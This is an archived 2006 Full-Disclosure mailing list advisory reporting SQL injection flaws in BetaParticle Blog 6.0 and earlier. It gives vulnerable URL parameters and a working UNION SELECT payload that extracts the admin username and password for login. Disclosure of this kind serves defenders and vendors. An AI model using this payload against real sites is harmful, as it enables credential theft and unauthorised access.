lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat Mar 18 18:39:20 2006 From: nukedx at nukedx.com (nukedx@...edx.com) Subject: Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities --Security Report-- Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 18/03/06 05:27 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@...edx.com Web: http://www.nukedx.com } --- Vendor: BetaParticle (http://www.betaparticle.com/) Version: 6.0 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL query. Level: Critical --- How&Example: GET -> http://[site]/bpdir/template_permalink.asp?id=[SQLQuery] GET -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery] Example -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername ,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1 With this example remote attacker could get admin's pass and can login from /main.asp -- Timeline: * 18/03/2006: Vulnerability found. * 18/03/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=20 --- PS: Edited exploit section in adv.
Powered by blists - more mailing lists